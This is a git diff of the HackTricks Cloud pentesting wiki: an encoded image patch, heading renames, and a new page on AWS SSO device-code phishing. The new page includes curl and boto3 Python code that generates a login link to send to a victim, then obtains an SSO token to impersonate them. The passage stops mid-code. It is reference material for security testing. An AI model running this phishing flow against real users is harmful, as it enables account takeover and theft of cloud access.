zO)4`rY3n5z7punWk4UT$Dd<K{FnrfXYU3COdh^h<VK}{}sp65&Q_?4DJ*0sWa~_OU
z*_zo8`nqhbSvxKPP)%7ss7FK9s@11BE@g53ds~-o7X|v)poP^?VG+wHD1OwIEjrAZ
zf1=Y0x*%hO!^G~c!pYcY#-!;61_TToK{yaa;FQ>gf0^d$Bk9)X;lm9yuX4^*bJZHZ
z_rmF|IH#1p`}-Qd`;f`G|1*e77wZ|wXcYK$`REkCB_>HhOqOS={XxC^EDe#;(Wi~b
z^GPz7+{w!?zxym69j*>Vqeq-il1A=o_GpjF%k#A9q%gvze<+b2F!Kra@uKY+)_nwv
zL$;DW(Ic?zc6eXgJU*qsDe`M|Du*Q<K&A<$9;rd43>UX<pKk}hQYQnWSpwbF62%#!
zvjv=WD7|sz_n}<M1S)1#(;(e)1Vz`n<?o(ko<I5`j2OA>NBYb(Q^^Og1@Kp*$Z61r
zPtY#wd}8oSNQOh{l95!hE7l9OlDTtbfc{;U;h&z*t^(_W+sm6xRy<NyoRTnzw~~AV
zJ_^3B1x7NbtsTOxB?o57rX~()u@&+06vf8pu&idHDZUX5ONL#~M-G<}4@<hDhPcM9
zL7GkWu_Ap}evfJunf0;_<-Tf|xYfGdV#|RS0ll-KnDn@8pLZ-O<2e(T`rrtL$2RA)
zK(U6cFo{r49B24lTOZJEkJZ_KM<!2oUb0)SFgD@yV{-ZR^z`f%84Ok+Zsow9VkP_N
zma|7RXF7T54(@=0Du>9T1SpvZaJTmbj*q%S!8=)2R4m+dqN*HT%Pm}_oxan<40J!k
zbD&8byfj^IcpjigsD@G%f9^Wm`Bj34Fe1y;-gx{+Qgc_p>G^ujR6i=`)jrp|oK?gj
znG0mbmQUF24DE}KC$J`+WJQ$}#U-zP9HC%0*QU6|j+;HDRedADOg~Iz{h`ODV3R0-
zE!yt=^>gNzifud$X^wDrq5Hj^ndeB#rSv>I>ZQXYfm885#10x8AJbPCv=)~iHR>lz
zE3OOXOye+(J*C0>m?f1cnAFzEms+m2MK5>Er}pC>$a~wJUCXAhi?CF|?4x>uPK2ij
z$-8#iV}*1BiwM$U$)^b4n;iE`Z-G83C68nF95#Xz4TP*2$Z#q+zkPovU2G2*7Rci{
zwgFf_{~^~Qq|>S{ji=X^9KM`Lwq0oK989E78wN#?8m@N*;MRxIXeZEqJ`|AF6nwd=
zNtI{sxc*-HL&0T|3v(pvwk9wYwf68R<t;vQm<(BvIvLM$p){X0%b7BeYp4Fs*?M=x
zgCYJoj!O0ygg;ts)@Dfiv3$94`T**`xKVbBi_QUs$vj)Kd(RzC7NaZb#{4-MW6eyB
zR1lq8GKXE`!*Q3)>HUdbU9^5LLS485wBCd~2ziy>Jl$IqdN6Cc#l#7uWILqrnf|0S
zc5_lyE-yvc2ISJ6iS+f*Zz)a@3nO6Bkjn|qtnT^|76F)edVb}}Avr5jdax)^%3_!B
zFBk1mM+Cw^Zd7!HeWEE{uMBCXXl%*N&6OE{p;Tk?igZQE@$=44@(XC5ay$iWhgEL$
zh8@!AquKqWQ`^Wmsw0!w72Wul2_F6lQc`LdjT*`SdxeUOIP?!IybXpLm^%;M+6ZJ^
zP3ePGo9=5|vUW8y+-ieC#pMk|ATPGAPP|TUGT8A6x1}IQ21mG^KqlAN{Rj6OQ;$sJ
z@$<;K^F`keZkzN3&pM+1z0k~xI0EkeeZ8r2oq5hxdOV>E7+cHi;Y<$#=gA=U?C%H_
zM>L2B;-jTu@}*OA4GeN{=AyOp1{>M*yggPGAPV21-j5PWrGql|Qocjg%eYl%P?BO2
zP4-@~9x->8(<yWjgo*eCfXLr(_vCYpwN$T<B@xj^;mb?j@>gd52+h@JQ0)|PS9)<!
zId>g2U8xH>7{lLulDqpC6clyM<GX*L(VL3OnF_!7B>>@<TZxx?GL+}eyfE%kRrl|v
zuh!U<oNNcb!-3$G0k>(AMh&EZZG)-CyA8f3#JEq=K*R{uwbb9{-%Zy=4`=BeAfD%a
z#*1rU4x+^H3OGv*5ae?3xvSGQn~d^mWm;2ww<9E1K;A^%ctaPTeMm|QjNDC1x%;D1
z8)>-5Zy}--tf0v0nGb3sYz7UgHhCSeCu2;H9gyXo&m}VxJ%SO{hTqKpkZ-m^$6;t3
zl?mZMf7Z{g{%h`Q$*lNdKWT7n=663ff_`9v7U9O!cpjK}5E5{i5#9|0l>xoP+0qSj
zTF>KPRzgKE_S^cjbvNO&3fpyZIi*taPG5661PUW}=N7-%Ot+SYT9zhWyYTbF#RY8z
zyhiD|g#1i+QI5r0uj8$z79&efYtzbib;|S-t8{_V4hSCwV-SNyF*^-O2z2&*i>Qs*
zu$Tb9x9mmm$%V%EVfqPgP|#zI*sj2ON>;z>7{;@v^C_@W0-=T2R!$&`M>0i}<up82
zH8tG%Pj-jcN7YR{>!#kn32~<r*ZY^zH!!+Cec=aJ3kb|o=NwK8Zf^n)-MB6#nFu0q
z@7rFm*O(!dCVU`aM@<a!wwR4j*zTCnbv{AWt2W@y6`g!n_aXdrRT>v7CYG|^|MI8X
zBhPh|M{k#9iGTNF$WTG%{d)7^!-x`OZ9iNTcQWBR^j3v`%xy20cBz&%Q=xL1*0;cR
z!7pq4#xj<M!|^e<LG5IKI;(`{2yyMhy5nu&)L!=$m*Y`TEaz$Ofh9C@36_?#8eW)=
zi#`Lqph{2cPcx*>c6mO*D{h)-L9Y&*=J5J7RM%#C3+uM)$fl_;l8K+cD-OdUGc}NR
z8#Y?Zvn&KRRs4RW2Vi3X_4|Ayh!`5(ZjWd5(~(ug;wc&*4X5fCODf8#as{6{!rg!2
z0{75-;IWWcGjnw&Ultr)5u~R0)$w$s<IhmKSsg$z6J}@xAn$iEp#O1fFv7^*zt%R(
zy5(M_)8kvnTIQEh&eT>+!(&jaXcHw7_eGSzrgIj&VzVPXo{U!^m&x+4{JtuxKkJ=O
z2K};{zb(!XM0df?pSI<fNL*g-lkz<MC?807Gx^=N5>#6l3!CP1MQ#TBH}e3h4WK)@
z$u|kZ9JR7P$7<Qd-)^+YLCer`bRtKin~R2g?R3;AN@=QOl&$h}L6Cuy$U<snZGX5k
z{&>9*7DZCQKL0PQ4}619y==0C`k&8|8&Twl8JRaB4(8iD#5;g5rU7;>PN!N?*LesO
zZM=~#RGpB>Y)q0;9o;Q-$;zLQ`QS#~htzDNVFg~$=&Yw8Z!G4kuS*}%>6QdF@w<WW
zgi2Pz1oam4sTTZ4?7?_P+!B&%7OsPqWmMUw!G2-^oY;KTBXCSQ_?s;`w^J=sj<YV#
zeJNPxGn?n7ai;h>Vp9)kaQWEIRwLST{%GGf*Er##>LN3m1Kee}NJ&?9#^tys$0bam
zF3rMxf5PXL$l?MAF<EgmsV49-sK>l$EDmP{4M4P2!Q7G@Q;;v}#{j6Y05EA)=P;sN
zwke^(23z#eX38+bmGrEUW)(w^Sbxs72PC{1jez^w-msm+r4TuCLTd1qdgx2-?V+R+
zk-<4_uabg=xuDk1bGLi4Qm?`gVI!>C3(4oK#zR|54{LScSthT~kkUsVJ*|plt3MJx
z9eK5XDHTpd?RbJ3$z@{fLIp$EQ`)57sIZssKr(tkV%SL*!Fw4?Q|6IeVo&aQdA?0<
zxmm#D$%1929*Im=%GLM*#WE5MTaSc3l3bA!Ez|(#e<2-!My0XcC_hP3gSaURgLh8O
zkLam8y<7~P5b5X3t4oS9#EK!6&V;e+D;YS#kPN`7B*l?Bha&F~dXMG%zep1+awZK;
zOL>nZls`Yic@Go}rUr%S1#cJ`y@$jp^SQ&k$I6jPf#LvvHl*PEi{ArfqGkOHP$c&G
z|7I6He}i|7ST0LbNi&HuF}NMrCe>I4-{(XKip4Og$UHNlXh;(>1Ig_N$UIl((QOZs
zj((%w#-hA&;7k_XJ&XO_9YC~=I1kAx-oJb_p8?e1Y>dwrp;UI*Dd_KUj69$S$heQz
z2x0%CJ+a=h#SrgLs;&OfbRXYB2)om|NZ)3;BLI~5w)>^6xfJiMX`Tp((c3>OsFZlC
zYV(%b));-taQH8wZ$Db7=e3cTfJG<fB^T<2pMpit)HkusY1CveQ<7Z%uUD-r9S6Kd
zB`9E#;V-~VSJ`4zE9xrq<U2#Xa#-vN``Cxc90RTNQ+_9r1lG`g!J{tXPIZt5B5NZR
zcU{Hk=62wycY3Yjb@*4FV)U09LhSnAC5SiC)`F=vS03%PFP(FZDa)@SO@_45DDZCF
zwr<<`74wCZLx%;7)5Ns^$;2hM&Uwx!)cZe}rA~@5=&K429Tt<$?beb9{8YuhO(`l|
zjEY5t|41bMjVLbp3NulCSUKRa+Gn1r&(kAuLf1AQr5Qs^RB<sd)=kLmsh;O~PQ9-x
zs4j0r8#m`{;9ER=!xc6C`4h!$T8lh#j~7tEcVyuprn~<uZv2^68fVGC4kV$Am6b2u
z{gnPlu)<`cV*FL(5Wt9fQ(>6@;<x~+k?ULhG>f4}xn!+DC@PNr&}CV1w;8K?sqV$W
z_Za{q0Mkkm#MavM#LYT+-@{T=8YGF|Jkw4#rPoh<?O_~+qt3r5k=$*fIj=S;6o28S
zfw)|jpUQ4$8ZVh<;`9gBMA-Sd*K-R;2|myZqd*u2U5d*Ns7b+|=h%Bb4wv9Zzl6&W
zx;UMu*hQ*m5+mdG2Cz92p{BHTmI&D%^K17HGv%VFrt;O{<g>lpLMa(X_25uUn|*01
zfX?>=2G{?|1IOW`5*A?F|MHRW7A}5O5*Xa_I41R{X=@ahf|b(^>bfvm$dwdy_hp{I
z3~z|&sQ-*@><j;r8h;f@D4>}^j18YJx}tVunVpsp8GC)(KSa#R;!TVn`tvK!X_aO6
zuGOuPHxMvVwCThu<y*^+z!crG%%jf1k4=ks8XV(NpGp#h8qeCP5m>Db9Td}l;HGaF
z7P45ZSo>Ls8exEz{^xd7ke=bON0s8k2K9Z9M$}WY7H0mw?EZ-i*123tXHu(`dm*-(
zqj9N)JF!YN4m3hOf~hu%l;;r!S@T2B5TwH$t19)A6erZ3Xh9mF)3*UW+cu-RuY{?5
zfQTXhC?**>@{^1>9AA-?79B$zFPF<sle}-lai=P1za)n_LYT>H-gSWYbFtDiUY$X`
z6Pw>9Q#UkPJkn01PYt>~oBpQI{?l_*5rps$#!Y;1baj<nVy2;m%2hn{>jMRDbq1Ee
zQ@*}%*vr*E$Q59iQ;5c^T1(4QSQ7LQ98jH1Kh{r!l|zd#GbTHi*`H0K6j3Y?NxXk}
z_mBx~s_2Q-#~$=BF)}TG3V|j8S5QKAeTq)p+}sXbFU)|!{|HNinmj<v&Eke<?j#b<
zjX5%}qXly@VZBm&T5<erO1D76(;v&229*xzDk@mqa%RtOttS`m!&OQFL}v0RsU){8
z*<Iz`YP=jNpl!NIMN()vO&ZvY#G^tOI)7)j?uj|p-%2!FVbQanIm?~8NK&x-9VR+h
zsHty1?eCKP*dCI!i!KwoqI@R<VJZh&xQ|c4zoB?{)H<xd;2TkmoUi$bVX!z@`ld@*
zgdgV@wgO*o<m)*~C-YYhnbf^YrSQRZ+f5iw8&wQj0gqbpBCJ2XfgSxNEtC};+dnB5
z@Su~ptF5xc6H^sX#pnSM#TFCC#!n6?t-&}*YAH!3T{Zn2*3@v}ElY}BTtY$z$vkq+
z41M<<^WeTuneCM7iK`g2GYDeEikYpW!ygQ@%%wdma4!jZcue-d+d+ASC|sAclCS}~
zs1jgMk*T*p0l=YU@I=E;l7J)5Oyh*r>qvJ`j!3Z4(R3tSo$&Azmbk0a+K}166~WT}
zZH4N;(v|JzJNDVsM;afcjqhvBC-rutZIs8uKeONgF~x+>^8AP^g!IIjsUgJ(+h33I
z5HA_#5~CE+@x_SZRK<&nOGN@qGFZDL5I%l#5bHDNo3<?~2J!+&D+5TU!iz2DVw{Uj
zTc%!^j5<Q^e{OxeWKeQq9rA^*79~`$=GjuG7LRXfA{I`>`TAo%{qZum{wP2EqTuau
z?Ld`tZNj4qL%W-3zyvh1*v9*9ej9lTCb)KQ6c83Cj+zTo*@o=38=<BPmwM`M(k7%w
z#=bR#n+%NgR&@Ct;M7I9j;*#1>9gU}k+BepRMYPWU<y)j-O)xTKBMe*M~jE=ncZkC
zVAc~?K1)yg-Al&2gEn#<eu__)L=ibqS`R24#MHH}i?ls}VI{;zV0w)kbg#w>K>T_e
z>*9mC^QFO9L>P-H)V@ri+-4$EPotsJ+(gOxz9oNy6F!gMr%1%sQ~#-lC4<jFs?K7O
z!NE)!*_;Mliw0x%Dj6F-oy~}Y8lP=Q1tOr6ufDs*9B5is<ZU%^vjCj$dgeay7Z1fj
zpT}|7PD8s8G}-9%Ar8wbTdzzB@`doZ^l2uvk?$DT&f`}7lYG2%sZ>NJZBKD2davQ9
z!MqAd=_tAjKqHJ1(t((GUBtcX;SOX_uhWo9qGm{8y?1T6<A2#r=3ylBVIv2tNp6Qi
z@SFQF-_kkl>xDqW8|e4N>XOu0(f5h@3j+CBU3b6sn!P-oE#c5B{sDHWK<CA|oL@hA
zG$xdWM^EiQ=6|`}*xuZ3$B{K{|Mv4f(0)642gBqhf;e{!28MX>_FDjNM#X>$sDx#K
zz}Vw0`<yu9ZQnmf(z*H9Y69e}GpOYqdw6r@3E_e^ddW?^j-!7yb5Vm^HU{JGh$wI(
z*bcwFI|qfJ7I%VaGeIT_`|G{%c3ftbU}6MFtRE_qWp&*s>MzGP<KUN_YG=?tcOrQ-
zGrXvKPaHFI&Fou`LJ**=ktm8z`gapW6x6>c6f5iduL```40P~T?^*JsUqEXEX>!Ux
zS0N}zLa0|?(&nEQ<S3}1p`&(=NWYtZpzIC8Z@z&4Se2j@`4BiGqxar*K%@PEw)F0(
z6!iyrA4Qp1(f`#12W6=A$F6~Lh2N%y6x21TZ%WF0*2xc${6whwcZE?wxiILcBP0I*
zYIdLn-?{SDc&5`6MP^Xj21Wg4`Hxo7flzk4Lp1fvOG>HimY-r2MK#Wa_CMgC`Nz`&
zct|k}DBtBtqW^6$4dc693PV-mL*@Lfn<tVVcO}wM^Hz)^31JdPW*QLMun|Hoz4M>^
zl$ST3YP(w(+CO6rS_WjS`L?x|;{P+&1mBFc)67cIxAr!|Z^l}-H6yL~zY7-i=5TGM
zqC<VFs__RjN`}3~;h{G<LJwr19s1=2{yiHAi_Ita71#+a6PLhi4Z+y*Q1Eo~_?ar>
zEedg8kz(t?DkI;yid2@%=?huqV@12+_=<<(PiN-AI9^o~EM`pjJQnasXGI*QI5`}j
z*2kOS7_!%aeWk+f*cPnemuFamu@-2%agnIOqsI0;I_AE_Td~L(sw^B*kf$SqO@eqC
z1!UnZFCk#|$Yk4gmu$Z@TVqA_lbuH4l1;Uz&{VW>Yy8r(ZQL4+1LTgSv<vmgq?3D{
z&QsmRb>o#EelAmIn*qupxpw-WCIJ3dHRm4B^!~^3%+it~96BXUM&+87%WS!H+%LoA
zeornP$t82Ca8O6G?U+j#p@$JtYqV&j<T{p1lu9@?%yP@ZhT(kC-@pHV|9>8j@8k3S
zK0crK^YwmwUav5^w{raQZ2>j3L0Z+_WUg^N&?&eV#mj6zqW5pasS8j4T4~5=;eN~#
zemS%}TN<$hT?i4JaJ(QiIyx<~f@Q$nYG!of68ao5_4Y!RRdNr3?s=bQ&Jg${yw4{2
z47gI>7M&|-Tz&&pSL_mvn|}Ww5^yU29<V@ETMI3F7B-CeOuPDk{hY*orG1lpWrS`E
z59os74-aNF%uOj#wX|wN*AA@2a@jSPIANLEAu^TrO@*j_c0ycCYp`3>#WL^BjZ}Z_
z9!1`mQjW^Kq0<ROBlm+qeI9q78Owl}n3^)wb-gJOEL+8<h@UbeK35KJ$oj-vZ+uy=
z8)p)|4#=TkVJ~$t1o?HB-mp)rsWYqB>QKCIAvJyjfrz;8*;jP@N;~4!cJCX{1>TTO
z#hp9|IUL+-82)dGv^vJM<%>^)t%085)QZcccAjCE!5K*;_B$EoLLioQbTi!yyZaM2
zb66+PozFO9ojqQORUqS4z?ME3MT|~%sL6Qi(HM}LCI%|w_ie6rukJ6nz=1vvYbsE(
z&VAhXGpunfiFyB(J@22RNR53m>N){PbwdHl<+WI{1B}b>@U&J)dIm&oY{TyfYpC_T
zbXYBC;tybRxmP<9QEqiHUm{Cw4y_k?4wsk7Z(cm?RR@&Z%3w1JN4P0LNc?&m9^z*v
zpRqgr-jqz~Zj0LT{Y#DVVE!8vV`&80-4ZySF_Z_&Qr#mBCSOa9=C+Zk+`jl25escj
ziDnb&fhgIGrUJh#u!x&vbSx$pvzfZ0li4aTu-MU$KIJw7du9BQO2y*J;+rtUwaLEv
zPF^~LMRs1Qy3W*;w6F$Da%D>KlSko6{99mrfp&=V$lPa|M_q7sf30Ecj}m$R3w>W`
z<rbgbDLGwkHf~l|FVH6Tmd7iFd<d1uYq_V!Bgp%TT3b~eavZ~-qw70ls+iMMa*>LJ
zK-<F==TmA;tS0^mMJ`GX&Tbg2j{^r{lw~`5(4HaLhC3CJisH69Vjh`kzo_Fq206+z
z!=2%6?W=Ob;ee)4hX9&FW-veKF64D#psksy=x>7|e)=h`9mOC1*1NGhgCU12obsS&
z|9ygYyZ&^g!pN~i(xdW<Mp-ryUS_2nQ`x&h?uuBP(mHYVo|;?XdiGr5X=QzjWQQha
zPKm%t)#u4q&2v25;HxUaoc~-UZ#_P0&O(@P3gTq!GT)JuK@d4)!WX^Y8XpO{*|NNz
z<6NlY-MKEngIr2f@Q^z_n!e23ed=S#5dFpV`2Cx{&%EEi!6jo<EOS_koB?#?BWFqu
zXhjoC5T2DIAdgp+zLM7IlF^uSJu|UlEG)2_o+=;n7iWydui;W!p(7dsY^C2oS6X_U
zg6Lkd?ABd5fqp7y01n*vQH#zzb{9Ewi`O)(ytI1Ws5^wz>B{OC2@+yXOY0O}{vmkd
z*`<v?qBjJi3HKuEj|@9lr<dci?#lo0jGU;jZ>sKTZe0FwgG<YwPjVr7aD7O<2)Wb2
z6_<Jn-QEVGOFkuWB(9mhqPQ!*oWEhB;&f6Ii7z$cWGa!_ST7u_Icw7EVP<>Flaki9
zHcpu{!>Oq{Gg5A;AIyrcv%kJHqmk?5+<za%vxI&F2mhI_7a5o*ofLd#K|E=%nAINi
z?$e3;6X+CQ?{=$PLXfoBq(K5)YBrDk6b;cS8Zk33Uaw#?iGNf%RaQIrMyuLG`FCJc
zR~<x9fhVG9Zmoi}E20@lKPe0Mqg3`O@9Ic<{+KkaU~_j3@8XrymCMm8ghD5}bBGQ2
z=_p)&t+5>Q@`D~KRja*Q-8n<V=88{3XrTlSaeyF&rBqiAMbn?tn)E~`=)mN4sd_*P
z5F%$`64;X(J<}~57YM4t!$!OYjsKny)HDAylwHJK8cbv7LMX~fCZN1c{y^h>@!Ki=
z!lMzEX(%q=@%z>N^Y!T2Ve&YpxSo+CtkIvBn!N9<XN`k*?64am>LeO{=%El2L;X6Z
zJ{kMN4ji6i=2aW;Q{NqWAc4|=D~MjWXzFDAg3@B}t~V6Lt%m<J?Ddzlz(0@cubIHm
zO%`hPZ=Izr#I4y$z228w#!R`7iAx-G#g?@<S^#6jLRmXU5&>WAiOBpJSgYCgc@Y$<
z^=FEsF*ND8YJg2xGc0>C#j8795~90hV3i8EzPT3^n=fg_es^<)iA2PR6b{<q@4i+O
z*^?~S&NNp@!fnl|N=H}3yyuPW&OMl)uOGvvfdQwXxHp%aVPvKpzKjboD{rO;odgk`
z^?w)DP_+hG0zhL4I$*cevVjnqVxXb(^WmmDv;zac049|Ba0i6mY{@BsP5!SyAW87?
zC$Ud`Wj9DgzgWxwQeta1EO#oc9=Q~%%gYWby3wz86$`^)FB$xT6N$gx8E>!nb{RM!
z630ZhzM5gw4wHy*^k{Eoy6>ba{ZB$F`9_7+D{ar<?m)I?cD{kX*ysNr{%FXJ;fk%a
zDnu5p81A$@V+dVXSlDpbvYBu5ZP39xX=y~kiUzS;HCqa>Sf=Sq%d!{5Td5r^A`l6~
zpt3r!>Ha%)1&q?>Mtd~!;g%oN++ekzR#l5(<|x^K9yPxG&Ofz)dV=*jq%<;ZQg=ud
n23%nZeiyg1n4n4F2l<8pMYJKDd1uU4lAEO|+T_W3-{k)Q+|`<?

literal 0
HcmV?d00001

diff --git a/SUMMARY.md b/SUMMARY.md
index 3f63d00d52..37a8ab00fc 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -318,7 +318,7 @@
     * [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md)
     * [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md)
     * [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-pentesting/aws-services/aws-kinesis-data-firehose-enum.md)
-    * [AWS - IAM Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md)
+    * [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md)
     * [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md)
     * [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md)
     * [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md)
@@ -349,6 +349,7 @@
     * [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md)
     * [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md)
     * [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
+    * [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
     * [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md)
     * [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md)
     * [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md)
diff --git a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
index b7f0932720..8cad6fae14 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
@@ -1,4 +1,4 @@
-# AWS - IAM Enum
+# AWS - IAM, Identity Center & SSO Enum
 
 <details>
 
@@ -9,7 +9,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -248,7 +248,7 @@ steampipe dashboard
 
 Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool send a PR!
 
-## Unauthenticated Access
+### Unauthenticated Access
 
 {% content-ref url="../../aws-pentesting/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md" %}
 [aws-iam-and-sts-unauthenticated-enum.md](../../aws-pentesting/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
@@ -386,7 +386,13 @@ mfa_serial = arn:aws:iam::123456789012:mfa/saanvi
 external_id = 123456
 ```
 
-### Privesc
+### Unauthenticated Access
+
+{% content-ref url="../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md" %}
+[aws-identity-center-and-sso-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Privilege Escalation
 
 {% content-ref url="../../aws-pentesting/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md" %}
 [aws-sso-and-identitystore-privesc.md](../../aws-pentesting/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md)
@@ -425,7 +431,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
new file mode 100644
index 0000000000..75f851c866
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md
@@ -0,0 +1,155 @@
+# AWS - Identity Center & SSO Unauthenticated Enum
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+
+## AWS Device Code Phishing
+
+Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**.
+
+In order to perform this attack the requisites are:
+
+* The victim needs to use **Identity Center**
+* The attacker must know the **subdomain** used by the victim `<victimsub>.awsapps.com/start`
+
+Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account.
+
+### Attack
+
+1. **Finding the subdomain**
+
+The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here.
+
+With this info, it's possible to get the region where the Indentity Center was configured with:
+
+```bash
+curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"'
+"region":"us-east-1
+```
+
+2. **Generate the link for the victim & Send it**
+
+Run the following code to generate an AWS SSO login link so the victim can authenticate.\
+For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token:
+
+```python
+import boto3
+
+REGION = 'us-east-1' # CHANGE THIS
+AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS
+
+sso_oidc = boto3.client('sso-oidc', region_name=REGION)
+client = sso_oidc.register_client(
+    clientName = 'attacker',
+    clientType = 'public'
+)
+
+client_id = client.get('clientId')
+client_secret = client.get('clientSecret')
+authz = sso_oidc.start_device_authorization(
+    clientId=client_id,
+    clientSecret=client_secret,
+    startUrl=AWS_SSO_START_URL
+)
+
+url = authz.get('verificationUriComplete')
+deviceCode = authz.get('deviceCode')
+print("Give this URL to the victim: " + url)
+```
+
+Send the generated link to the victim using you awesome social engineering skills!
+
+3. **Wait until the victim accepts it**
+
+If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\
+This is how the promp looks nowadays:
+
+<figure><img src="../../../.gitbook/assets/image (154).png" alt="" width="311"><figcaption></figcaption></figure>
+
+4. **Get SSO access token**
+
+If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**:
+
+```python
+token_response = sso_oidc.create_token(
+    clientId=client_id,
+    clientSecret=client_secret,
+    grantType="urn:ietf:params:oauth:grant-type:device_code",
+    deviceCode=deviceCode
+)
+sso_token = token_response.get('accessToken')
+```
+
+The SSO access token is **valid for 8h**.
+
+5. **Impersonate the user**
+
+```python
+sso_client = boto3.client('sso', region_name=REGION)
+
+# List accounts where the user has access
+aws_accounts_response = sso_client.list_accounts(
+        accessToken=sso_token,
